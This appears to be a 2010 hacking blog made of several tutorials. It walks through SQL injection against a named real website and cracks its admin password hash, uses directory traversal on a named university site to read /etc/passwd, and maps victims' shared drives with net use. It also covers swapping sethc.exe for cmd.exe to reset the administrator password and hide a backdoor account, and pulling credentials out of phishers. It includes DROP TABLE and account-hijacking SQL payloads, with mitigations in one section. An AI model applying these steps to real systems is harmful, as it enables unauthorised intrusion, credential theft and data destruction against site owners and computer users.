Thursday 30 September 2010

Hack websites using Auto SQL Helper

I have been asked Recently to write a tutorial on how to use
"SQL I Helper V.2.7" tool.
At the beginning "SQLI HelperV.2.7" is a tool that can hack vulnerable websites using SQL injection. You don't have to spend hours and hours trying to find your way in a website and trying hundreds of combination's and codes to hack a website.
This tool will do it all by itself. You only have to tell it what to do.
You can download it from here:
Download Link: (this should link to reiluke.i.ph and nowhere else!)
http://reiluke.i.ph/blogs/reiluke/20...download-link/

And
Download Video Tutorial Here
Lets start.
First you need to find the potential website that you think it might be possible to hack it. Remember that some websites are simply unhackable.
After you find your website ( better to end with "article.php?id=[number]" ) example: "http://encycl.anthropology.ru/article.php?id=1"

I will explain my tut on how to hack this website.

Check if your website can be hacked by trying to go this address :
http://encycl.anthropology.ru/article.php?id='1 <------ notice the ' before the number 1.

you should get this message:
Code:
Query failedYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

This mean that this website can be hacked because you get an error.

Now open your SQL I Helper V.2.7
and write the link :
http://encycl.anthropology.ru/article.php?id=1 <---- without the '
here
[Image: 2n8wtow.jpg]

and press the inject button.

Now you should wait until the tool finish searching for columns . Time may vary depending on your connection speed , your pc speed , and the number of columns in the website.
So now you should have this:
[Image: 15xvl2v.jpg]

then select "Get database" and you get this:
http://i40.tinypic.com/znq9tz.jpg

Now select any element from the "database name" box and press the "Get tables" button , I will select "anthropo_encycl":
[Image:  668zs6.jpg]


then select any element from the "table name" box and press the "Get columns" button , I will select "user":
[Image: 24e3vyo.jpg]

then select any elements you want from the "columns name" box and press "Dump Now" , i will select "usr_login" and "usr_pass"
[Image: 2vb4ndj.jpg]

After clicking "Dump Now" , you should see this new window
[Image:  fxwj2p.jpg]

Now copy the hash on a peace of paper and go to this website:
http://www.md5crack.com/

enter the hash and press the button "Crack that hash baby!" and you should get the source of the hash.
hash:21232f297a57a5a743894a0e4a801fc3
username: admin

hash:202cb962ac59075b964b07152d234b70
Password: 123
.................................................................................................................................... ..................................................................................
.................................................................................................................................... .................................................................................

How to Unlock the iPhone 3G, 3GS Using BlackSn0w


These are instructions on how to unlock the iPhone 3G and 3GS using BlackSn0w. To follow these instructions you must be on the 05.11.07 baseband and have already jailbroken.

If you have not already jailbroken it will be easier to follow one of these tutorials which will walk you through both jailbreaking and unlocking.
- Windows
- Mac
To check your baseband you can follow these instructions.

Lets begin...

Watch the Video!
For your convenience this tutorial is available in video format also. Click the Watch It button to view the tutorial!








Step One
Press to launch Cydia from your iPhone Springboard.

Step Two
Press to select Manage from the tabs at the bottom of the screen.

Step Three
Press the large Sources button.

Step Four
Press the Edit button at the top right of the screen.

Step Five
Press the Add button at the top left of the screen.

Step Six
Input http://www.blackra1n.com as the source address then press the Add Source button. Once Cydia has added the source press the large Return to Cydia button.

Step Seven
Press the Done button at the top right of the screen.

Step Eight
Press to select blackra1n.com from the list of sources.

Step Nine
Press to select blacksn0w from the list of packages.

Step Ten
Press the Install button at the top right of the screen.

Step Eleven
Press the Confirm button at the top right to begin installation.

Step Twelve
Once the unlock has been installed successfully press the large Return to Cydia button.

Step Thirteen
Wait a few minutes for your CommCenter to restart and you will now be able to use the SIM card of your choice on your unlocked iPhone!

.....................................................................................................................................................................................................................
.....................................................................................................................................................................................................................

How to hack websites using LFI (Local File Inlcusion)

  A Directory Transversal Attack


What is root directory of web server ?

It is a specific directory on server in which the web contents are placed and can be seen by website visitors. The directories other that root may contain any sensitive data which administrator do not want visitors to see. Everything accessible by visitor on a website is  placed in root directory. The visitor can not step out of root directory.

what does ../ or ..\ (dot dot slash) mean  ?

The ..\ instructs the system to go one directory up. For example, we are at this location
C:\xx\yy\zz. On typing ..\ , we would reach at C:\xx\yy.

Again on typing
..\ , we would rech at C:\xx . 

Lets again go at locatio
n C:\xx\yy\zz. Now suppose we want to access a text file abc.txt placed in folder xx. We can type ..\..\abc.txt . Typing ..\ two times would take us two directories up (that is to directory xx) where abc.txt is placed.
Note : Its ..\ on windows and ../ on UNIX like operating syatem.
What is Directory Transversel attack?

Directory Traversal is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

The goal of this attack is  to access sensitive files placed on web server by stepping out of the root directory using dot dot slash .

The following example will make clear everything

Visit this website vulnerable to directory transversal attack

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=notification.php

This webserver is running on UNIX like operating system. There is a directory 'etc' on unix/linux which contains configration files of programs that run on system. Some of the files are passwd,shadow,profile,sbin  placed in 'etc' directory.

The file
etc/passwd contain the login names of users and even passwords too.

Lets try to access this file on webserver by stepping out of the root directory. Carefully See the position of directories placed on the webserver.


We do not know the actual names and contents of directories except 'etc' which is default name , So I have
marked them as A,B,C,E or whatever.

We are in directory in F accessing the webpages of website.


Lets type this in URL field and press enter

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=etc/passwd

This will search the directory 'etc' in F. But obviously, there is nothing like this in F, so it will return nothing
Now type
http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../etc/passwd
Now this will step up one directory (to directory E ) and look for 'etc' but again it will return nothing.
Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../etc/passwd

Now this will step up two directories (to directory D ) and look for 'etc' but again it will return nothing.

So by proceeding like this, we we go for this URL

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd

It takes us 5 directories up to the main drive and then to '
etc' directory and show us contents of 'passwd' file.
To understand the contents of 'passwd' file, visit http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format


You can also view
etc/profile ,etc/services and many others files like backup files which may contain sensitive data. Some files like etc/shadow may be not be accessible because they are accesible only by privileged users.
Note- If proc/self/environ would be accessible, you might upload a shell on server which is called as Local File Inclusion.
Counter Measures
1. Use the latest web server software 2. Effectively filter the user's input
................................................................. .....................................................................................................................................................

Hacking into NetBIOS


NetBIOS Hacking
-What is it?-
Net BIOS Hacking is the art of hacking into someone else’s computer through your computer. Net BIOS stands for “Network Basic Input Output System.” It is a way for a LAN or WAN to share folders, files, drives, and printers.

-How can this be of use to me?-
Most people don’t even know, but when they’re on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.

-What do I need?-
Windows OS
Cain and Abel (http://www.oxid.it/)
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
-[Step 1, Finding the target.]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross

Another window will pop up, make sure “All host in my subnet” is selected, and then click ok.

It should begin to scan

Then IP’s, computer names, and mac addresses will show up.
Now remember the IP address of the computer you are going to be breaking into.
If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok.
During the next step we will begin our trial and error.

++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
-[Part 2, Trial and Error]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++

Now, we don’t know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN.
If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on.
Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.
From here we will do most of the hacking.
Now I will be referring to certain commands that need to be inputted into the command prompt.
I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt.
I am only doing this to avoid confusion.
Let’s get back to the hacking.
Type in “ping (IP address of the target).” For example in this tutorial, “ping 192.168.1.103.”
This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private information):

If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.

++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
-[Part 3, Gathering the Information.]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++

Now, input this command “nbtstat –a (IP address of target).” An example would be “nbtstat –a 192.168.1.103.”


This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.

Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it.

The information right below the original command says: “Local Area Connection,” this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP.

The information right below the “Local Area Connection,” is “Wireless Network Connection 2:” It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into.

The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn’t. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup

++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
-[Step 4, Breaking In]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++

Finally it’s time.
By now we know: that our target is online, our target has file sharing, and our target’s computer name.
So it’s time to break in.
We will now locate the shared drives, folders, files, or printers. Type in “net view \\(IP Address of Target)”
An example for this tutorial would be: “net view \\192.168.1.103”

We have our just found our share name. In this case, under the share name is “C,” meaning that the only shared thing on the computer is C. Then to the right, under Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person’s hard drive.

All's that is left to do is “map” the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in “net use K: \\(IP Address of Target)\(Shared Drive). For my example in this tutorial, “net use K: \\192.168.1.103\C.” Ok, let’s say that you plan on doing this again to a different person, do u see the “K after “net use?” This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be “net use G...,” for a different

As you can see, for my hack I have already used “K,” so I used “G” instead.
You may also do the same for multiple hacks.
If it worked, it will say “The command completed successfully.”
If not, you will have to go retrace you steps.
Now open up “my computer” under the start menu, and your newly created network drive should be there.

Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive.
The drive will not be deleted after you disconnect though, but you won’t be able to access it until you reconnect to the network.
So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer,
because you never know if the target changes the sharing setting.
If you are just doing this to hack something, then go explore it and have some well deserved fun!

Congratulations! You’re DONE!

-Commands used in this tutorial:
PING
NBTSTAT -a (IP Address of Target)
NET VIEW \\(IP Address of Target)
NET USE K: \\(IP Address of Target)\(SHARENAME)
..................... ................................................................................................................

Phisher Program Reversed

Step 1 -Head to http://reflector.red-gate.com/Download.aspx and download .NET reflector
Step 2 - Run .NET reflector


.NET reflector

 

Step 3 - Download the phisher you want to reverse
Step 4 - Go into your Downloads folder and grab your phisher into .NET Reflector


.NET reflector

 

Step 5 - expand your phisher

.NET reflector

 

Step 6 - Open the one that is the name of the file, not the ".MY", ".MY.RESOURCES", or "-" or "references"

.NET reflector

 

Step 7 - Theirs usually a form1, expand it

.NET reflector

 

Step 8 - Look for button1_click, or something very similar, it's usually near the top, right click it and click 
"Disassemble"

.NET reflector

 

Step 9 - Now look for Network credentials, and you have the email info

.NET reflector


Step 10 - Go to the email, check the inbox


[How to find phishers on youtube]

What to search for

MapleStory:

Meso Generator

NX Generator

Rapidshare:
Point Generator

XBL:

Xboxlive generator
Points Generator

RuneScape:

Item generator
Gold Generator
Skill Changer

Friday 17 September 2010

SQL Injections Basics New

"SQL Injection" is subset of the an unverified/unsanitized user input vulnerability ("buffer overflows" are a different subset), and the idea is to convince the application to run SQL code that was not intended. If the application is creating SQL strings naively on the fly and then running them, it's straightforward to create some real surprises.
We'll note that this was a somewhat winding road with more than one wrong turn, and others with more experience will certainly have different -- and better -- approaches. But the fact that we were successful does suggest that we were not entirely misguided.
There have been other papers on SQL injection, including some that are much more detailed, but this one shows the rationale of discovery as much as the process of exploitation.

The Target Intranet

This appeared to be an entirely custom application, and we had no prior knowledge of the application nor access to the source code: this was a "blind" attack. A bit of poking showed that this server ran Microsoft's IIS 6 along with ASP.NET, and this suggested that the database was Microsoft's SQL server: we believe that these techniques can apply to nearly any web application backed by any SQL server.
The login page had a traditional username-and-password form, but also an email-me-my-password link; the latter proved to be the downfall of the whole system.
When entering an email address, the system presumably looked in the user database for that email address, and mailed something to that address. Since my email address is not found, it wasn't going to send me anything.
So the first test in any SQL-ish form is to enter a single quote as part of the data: the intention is to see if they construct an SQL string literally without sanitizing. When submitting the form with a quote in the email address, we get a 500 error (server failure), and this suggests that the "broken" input is actually being parsed literally. Bingo.
We speculate that the underlying SQL code looks something like this:
SELECT fieldlist
FROM table
WHERE field = '$EMAIL';
Here, $EMAIL is the address submitted on the form by the user, and the larger query provides the quotation marks that set it off as a literal string. We don't know the specific names of the fields or table involved, but we do know their nature, and we'll make some good guesses later.
When we enter steve@unixwiz.net' - note the closing quote mark - this yields constructed SQL:
SELECT fieldlist
FROM table
WHERE field = 'steve@unixwiz.net'';
when this is executed, the SQL parser find the extra quote mark and aborts with a syntax error. How this manifests itself to the user depends on the application's internal error-recovery procedures, but it's usually different from "email address is unknown". This error response is a dead giveaway that user input is not being sanitized properly and that the application is ripe for exploitation.
Since the data we're filling in appears to be in the WHERE clause, let's change the nature of that clause in an SQL legal way and see what happens. By entering anything' OR 'x'='x, the resulting SQL is:
SELECT fieldlist
FROM table
WHERE field = 'anything' OR 'x'='x';
Because the application is not really thinking about the query - merely constructing a string - our use of quotes has turned a single-component WHERE clause into a two-component one, and the 'x'='x' clause is guaranteed to be true no matter what the first clause is (there is a better approach for this "always true" part that we'll touch on later).
But unlike the "real" query, which should return only a single item each time, this version will essentially return every item in the members database. The only way to find out what the application will do in this circumstance is to try it. Doing so, we were greeted with:

Your login information has been mailed to random.person@example.com.
Our best guess is that it's the first record returned by the query, effectively an entry taken at random. This person really did get this forgotten-password link via email, which will probably come as surprise to him and may raise warning flags somewhere.
We now know that we're able to manipulate the query to our own ends, though we still don't know much about the parts of it we cannot see. But we have observed three different responses to our various inputs:
  • "Your login information has been mailed to email"
  • "We don't recognize your email address"
  • Server error
The first two are responses to well-formed SQL, while the latter is for bad SQL: this distinction will be very useful when trying to guess the structure of the query.

Schema field mapping

The first steps are to guess some field names: we're reasonably sure that the query includes "email address" and "password", and there may be things like "US Mail address" or "userid" or "phone number". We'd dearly love to perform a SHOW TABLE, but in addition to not knowing the name of the table, there is no obvious vehicle to get the output of this command routed to us.
So we'll do it in steps. In each case, we'll show the whole query as we know it, with our own snippets shown specially. We know that the tail end of the query is a comparison with the email address, so let's guess email as the name of the field:
SELECT fieldlist
FROM table
WHERE field = 'x' AND email IS NULL; --';
The intent is to use a proposed field name (email) in the constructed query and find out if the SQL is valid or not. We don't care about matching the email address (which is why we use a dummy 'x'), and the -- marks the start of an SQL comment. This is an effective way to "consume" the final quote provided by application and not worry about matching them.
If we get a server error, it means our SQL is malformed and a syntax error was thrown: it's most likely due to a bad field name. If we get any kind of valid response, we guessed the name correctly. This is the case whether we get the "email unknown" or "password was sent" response.
Note, however, that we use the AND conjunction instead of OR: this is intentional. In the SQL schema mapping phase, we're not really concerned with guessing any particular email addresses, and we do not want random users inundated with "here is your password" emails from the application - this will surely raise suspicions to no good purpose. By using the AND conjunction with an email address that couldn't ever be valid, we're sure that the query will always return zero rows and never generate a password-reminder email.
Submitting the above snippet indeed gave us the "email address unknown" response, so now we know that the email address is stored in a field email. If this hadn't worked, we'd have tried email_address or mail or the like. This process will involve quite a lot of guessing.
Next we'll guess some other obvious names: password, user ID, name, and the like. These are all done one at a time, and anything other than "server failure" means we guessed the name correctly.
SELECT fieldlist
FROM table
WHERE email = 'x' AND userid IS NULL; --';
As a result of this process, we found several valid field names:
  • email
  • passwd
  • login_id
  • full_name
There are certainly more (and a good source of clues is the names of the fields on forms), but a bit of digging did not discover any. But we still don't know the name of the table that these fields are found in - how to find out?

Finding the table name

The application's built-in query already has the table name built into it, but we don't know what that name is: there are several approaches for finding that (and other) table names. The one we took was to rely on a subselect.
A standalone query of
SELECT COUNT(*) FROM tabname
Returns the number of records in that table, and of course fails if the table name is unknown. We can build this into our string to probe for the table name:
SELECT email, passwd, login_id, full_name
FROM table
WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); --';
We don't care how many records are there, of course, only whether the table name is valid or not. By iterating over several guesses, we eventually determined that members was a valid table in the database. But is it the table used in this query? For that we need yet another test using table.field notation: it only works for tables that are actually part of this query, not merely that the table exists.
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x' AND members.email IS NULL; --';
When this returned "Email unknown", it confirmed that our SQL was well formed and that we had properly guessed the table name. This will be important later, but we instead took a different approach in the interim.

Finding some users

At this point we have a partial idea of the structure of the members table, but we only know of one username: the random member who got our initial "Here is your password" email. Recall that we never received the message itself, only the address it was sent to. We'd like to get some more names to work with, preferably those likely to have access to more data.
The first place to start, of course, is the company's website to find who is who: the "About us" or "Contact" pages often list who's running the place. Many of these contain email addresses, but even those that don't list them can give us some clues which allow us to find them with our tool.
The idea is to submit a query that uses the LIKE clause, allowing us to do partial matches of names or email addresses in the database, each time triggering the "We sent your password" message and email. Warning: though this reveals an email address each time we run it, it also actually sends that email, which may raise suspicions. This suggests that we take it easy.
We can do the query on email name or full name (or presumably other information), each time putting in the % wildcards that LIKE supports:
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x' OR full_name LIKE '%Bob%';
Keep in mind that even though there may be more than one "Bob", we only get to see one of them: this suggests refining our LIKE clause narrowly.
Ultimately, we may only need one valid email address to leverage our way in.

Brute-force password guessing

One can certainly attempt brute-force guessing of passwords at the main login page, but many systems make an effort to detect or even prevent this. There could be logfiles, account lockouts, or other devices that would substantially impede our efforts, but because of the non-sanitized inputs, we have another avenue that is much less likely to be so protected.
We'll instead do actual password testing in our snippet by including the email name and password directly. In our example, we'll use our victim, bob@example.com and try multiple passwords.
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'bob@example.com' AND passwd = 'hello123';
This is clearly well-formed SQL, so we don't expect to see any server errors, and we'll know we found the password when we receive the "your password has been mailed to you" message. Our mark has now been tipped off, but we do have his password.
This procedure can be automated with scripting in perl, and though we were in the process of creating this script, we ended up going down another road before actually trying it.

The database isn't readonly

So far, we have done nothing but query the database, and even though a SELECT is readonly, that doesn't mean that SQL is. SQL uses the semicolon for statement termination, and if the input is not sanitized properly, there may be nothing that prevents us from stringing our own unrelated command at the end of the query.
The most drastic example is:
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x'; DROP TABLE members; --'; -- Boom!
The first part provides a dummy email address -- 'x' -- and we don't care what this query returns: we're just getting it out of the way so we can introduce an unrelated SQL command. This one attempts to drop (delete) the entire members table, which really doesn't seem too sporting.
This shows that not only can we run separate SQL commands, but we can also modify the database. This is promising.

Adding a new member

Given that we know the partial structure of the members table, it seems like a plausible approach to attempt adding a new record to that table: if this works, we'll simply be able to login directly with our newly-inserted credentials.
This, not surprisingly, takes a bit more SQL, and we've wrapped it over several lines for ease of presentation, but our part is still one contiguous string:
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x';
INSERT INTO members ('email','passwd','login_id','full_name')
VALUES ('steve@unixwiz.net','hello','steve','Steve Friedl');--';
Even if we have actually gotten our field and table names right, several things could get in our way of a successful attack:
  1. We might not have enough room in the web form to enter this much text directly (though this can be worked around via scripting, it's much less convenient).
  2. The web application user might not have INSERT permission on the members table.
  3. There are undoubtedly other fields in the members table, and some may require initial values, causing the INSERT to fail.
  4. Even if we manage to insert a new record, the application itself might not behave well due to the auto-inserted NULL fields that we didn't provide values for.
  5. A valid "member" might require not only a record in the members table, but associated information in other tables (say, "accessrights"), so adding to one table alone might not be sufficient.
In the case at hand, we hit a roadblock on either #4 or #5 - we can't really be sure -- because when going to the main login page and entering in the above username + password, a server error was returned. This suggests that fields we did not populate were vital, but nevertheless not handled properly.
A possible approach here is attempting to guess the other fields, but this promises to be a long and laborious process: though we may be able to guess other "obvious" fields, it's very hard to imagine the bigger-picture organization of this application.
We ended up going down a different road.

Mail me a password

We then realized that though we are not able to add a new record to the members database, we can modify an existing one, and this proved to be the approach that gained us entry.
From a previous step, we knew that bob@example.com had an account on the system, and we used our SQL injection to update his database record with our email address:
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x';
UPDATE members
SET email = 'steve@unixwiz.net'
WHERE email = 'bob@example.com';
After running this, we of course received the "we didn't know your email address", but this was expected due to the dummy email address provided. The UPDATE wouldn't have registered with the application, so it executed quietly.
We then used the regular "I lost my password" link - with the updated email address - and a minute later received this email:
Now it was now just a matter of following the standard login process to access the system as a high-ranked MIS staffer, and this was far superior to a perhaps-limited user that we might have created with our INSERT approach.
We found the intranet site to be quite comprehensive, and it included - among other things - a list of all the users. It's a fair bet that many Intranet sites also have accounts on the corporate Windows network, and perhaps some of them have used the same password in both places. Since it's clear that we have an easy way to retrieve any Intranet password, and since we had located an open PPTP VPN port on the corporate firewall, it should be straightforward to attempt this kind of access.
We had done a spot check on a few accounts without success, and we can't really know whether it's "bad password" or "the Intranet account name differs from the Windows account name". But we think that automated tools could make some of this easier.

Other Approaches

In this particular engagement, we obtained enough access that we did not feel the need to do much more, but other steps could have been taken. We'll touch on the ones that we can think of now, though we are quite certain that this is not comprehensive.
We are also aware that not all approaches work with all databases, and we can touch on some of them here.
Use xp_cmdshell
Microsoft's SQL Server supports a stored procedure xp_cmdshell that permits what amounts to arbitrary command execution, and if this is permitted to the web user, complete compromise of the webserver is inevitable.
What we had done so far was limited to the web application and the underlying database, but if we can run commands, the webserver itself cannot help but be compromised. Access to xp_cmdshell is usually limited to administrative accounts, but it's possible to grant it to lesser users.
Map out more database structure
Though this particular application provided such a rich post-login environment that it didn't really seem necessary to dig further, in other more limited environments this may not have been sufficient.
Being able to systematically map out the available schema, including tables and their field structure, can't help but provide more avenues for compromise of the application.
One could probably gather more hints about the structure from other aspects of the website (e.g., is there a "leave a comment" page? Are there "support forums"?). Clearly, this is highly dependent on the application and it relies very much on making good guesses.

Mitigations

We believe that web application developers often simply do not think about "surprise inputs", but security people do (including the bad guys), so there are three broad approaches that can be applied here.
Sanitize the input
It's absolutely vital to sanitize user inputs to insure that they do not contain dangerous codes, whether to the SQL server or to HTML itself. One's first idea is to strip out "bad stuff", such as quotes or semicolons or escapes, but this is a misguided attempt. Though it's easy to point out some dangerous characters, it's harder to point to all of them.
The language of the web is full of special characters and strange markup (including alternate ways of representing the same characters), and efforts to authoritatively identify all "bad stuff" are unlikely to be successful.
Instead, rather than "remove known bad data", it's better to "remove everything but known good data": this distinction is crucial. Since - in our example - an email address can contain only these characters:
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
0123456789
@.-_+
There is really no benefit in allowing characters that could not be valid, and rejecting them early - presumably with an error message - not only helps forestall SQL Injection, but also catches mere typos early rather than stores them into the database.
Sidebar on email addresses
It's important to note here that email addresses in particular are troublesome to validate programmatically, because everybody seems to have his own idea about what makes one "valid", and it's a shame to exclude a good email address because it contains a character you didn't think about. The only real authority is RFC 2822 (which encompasses the more familiar RFC822), and it includes a fairly expansive definition of what's allowed. The truly pedantic may well wish to accept email addresses with ampersands and asterisks (among other things) as valid, but others - including this author - are satisfied with a reasonable subset that includes "most" email addresses. Those taking a more restrictive approach ought to be fully aware of the consequences of excluding these addresses, especially considering that better techniques (prepare/execute, stored procedures) obviate the security concerns which those "odd" characters present.
Be aware that "sanitizing the input" doesn't mean merely "remove the quotes", because even "regular" characters can be troublesome. In an example where an integer ID value is being compared against the user input (say, a numeric PIN):
SELECT fieldlist
FROM table
WHERE id = 23 OR 1=1; -- Boom! Always matches!
In practice, however, this approach is highly limited because there are so few fields for which it's possible to outright exclude many of the dangerous characters. For "dates" or "email addresses" or "integers" it may have merit, but for any kind of real application, one simply cannot avoid the other mitigations.
Escape/Quotesafe the input
Even if one might be able to sanitize a phone number or email address, one cannot take this approach with a "name" field lest one wishes to exclude the likes of Bill O'Reilly from one's application: a quote is simply a valid character for this field.
One includes an actual single quote in an SQL string by putting two of them together, so this suggests the obvious - but wrong! - technique of preprocessing every string to replicate the single quotes:
SELECT fieldlist
FROM customers
WHERE name = 'Bill O''Reilly'; -- works OK
However, this naïve approach can be beaten because most databases support other string escape mechanisms. MySQL, for instance, also permits \' to escape a quote, so after input of \'; DROP TABLE users; -- is "protected" by doubling the quotes, we get:
SELECT fieldlist
FROM customers
WHERE name = '\''; DROP TABLE users; --'; -- Boom!
The expression '\'' is a complete string (containing just one single quote), and the usual SQL shenanigans follow. It doesn't stop with backslashes either: there is Unicode, other encodings, and parsing oddities all hiding in the weeds to trip up the application designer.
Getting quotes right is notoriously difficult, which is why many database interface languages provide a function that does it for you. When the same internal code is used for "string quoting" and "string parsing", it's much more likely that the process will be done properly and safely.
Some examples are the MySQL function mysql_real_escape_string() and perl DBD method $dbh->quote($value).
These methods must be used.
Use bound parameters (the PREPARE statement)
Though quotesafing is a good mechanism, we're still in the area of "considering user input as SQL", and a much better approach exists: bound parameters, which are supported by essentially all database programming interfaces. In this technique, an SQL statement string is created with placeholders - a question mark for each parameter - and it's compiled ("prepared", in SQL parlance) into an internal form.
Later, this prepared query is "executed" with a list of parameters:
Example in perl
$sth = $dbh->prepare("SELECT email, userid FROM members WHERE email = ?;");

$sth->execute($email);
Thanks to Stefan Wagner, this demonstrates bound parameters in Java:
Insecure version
Statement s = connection.createStatement();
ResultSet rs = s.executeQuery("SELECT email FROM member WHERE name = "
+ formField); // *boom*
Secure version
PreparedStatement ps = connection.prepareStatement(
"SELECT email FROM member WHERE name = ?");
ps.setString(1, formField);
ResultSet rs = ps.executeQuery();
Here, $email is the data obtained from the user's form, and it is passed as positional parameter #1 (the first question mark), and at no point do the contents of this variable have anything to do with SQL statement parsing. Quotes, semicolons, backslashes, SQL comment notation - none of this has any impact, because it's "just data". There simply is nothing to subvert, so the application is be largely immune to SQL injection attacks.
There also may be some performance benefits if this prepared query is reused multiple times (it only has to be parsed once), but this is minor compared to the enormous security benefits. This is probably the single most important step one can take to secure a web application.

Thursday 16 September 2010

Hack administrator from Guest account.



Ever wanted to hack your college pc with guest account/student account so that you can download with full speed there ? or just wanted to hack your friend’s pc to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the  administrator password and getting all the privilages an administrator enjoys on windows..Interested ? read on…
Concept
Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.
Prerequisites
Guest account with write access to system 32.
Here is how to do that -
  • Go to C:/windows/system32
  • Copy cmd.exe and paste it on desktop
  • rename cmd.exe to sethc.exe
  • Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
                                                    

  • Now Log out from your guest account and at the user select window,press shift key 5 times.
  • Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open. 


  • Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.
  • You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password.
  • Congrats You have hacked admin from guest account.
Further..
Also, you can further create a new user at the command prompt by typing “NET USER XERO /ADD” where “XERO” is the username you would like to add with administrator privileges. Then hide your newly created admin account by -
Go to registry editor and navigate to this key
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Here create a new DWORD value, write its name as the “user name” that u created for your admin account and live with your admin account forever :)
I hope that was informative..
........... ...............................................................................................................................................................................................................

Tuesday 14 September 2010

Basic Steps On SQL Injections



Introduction

I've seen a lot of short tutorials on SQL injections and then again some which rivals the Great Wall of china in length, but I've very rarely seen a SQL injection tutorial based on an actual hack where things aren't always ideal.

This guide will attempt to explain the very basics of SQL injections.



This tutorial is written from a website created by a friend of mine which was loaded on my local host.
After navigating around for a while I found something interesting

http://localhost/news/display.asp?id=75






-------------------------------------------------------------------

Section 1 - A Quick Glance at SQL Statements

-------------------------------------------------------------------

Anyone who's ever taken a look at SQL injections won't be surprised to know what I did next...

http://localhost/news/display.asp?id=75'

Unclosed quotation mark after the character string ''.


So for all of you who don't know why I'm getting the error:

The ID is passed (posted) to the SQL server and added in the query...


SQL SELECT queries consists of 3 basic building blocks,

1) SELECT
2) FROM
3) WHERE

SELECT is used to specify what information should be returned, usually column names are used here

FROM specifies where the information that you want to select is contained, usually a table name

WHERE is used to specify conditions, data will be only be selected if the data set matches the conditions.

Let's take the following example of a table called "Demo" which consists of the columns, "ID", "Text", "Active" and "GROUP"

TBLDEMO

ID TEXT ACTIVE GROUP
1 First Result TRUE 0
2 Second Result FALSE 54
3 Third Result TRUE 54
4 Fourth Result FALSE 36
5 RAMBO FALSE 1
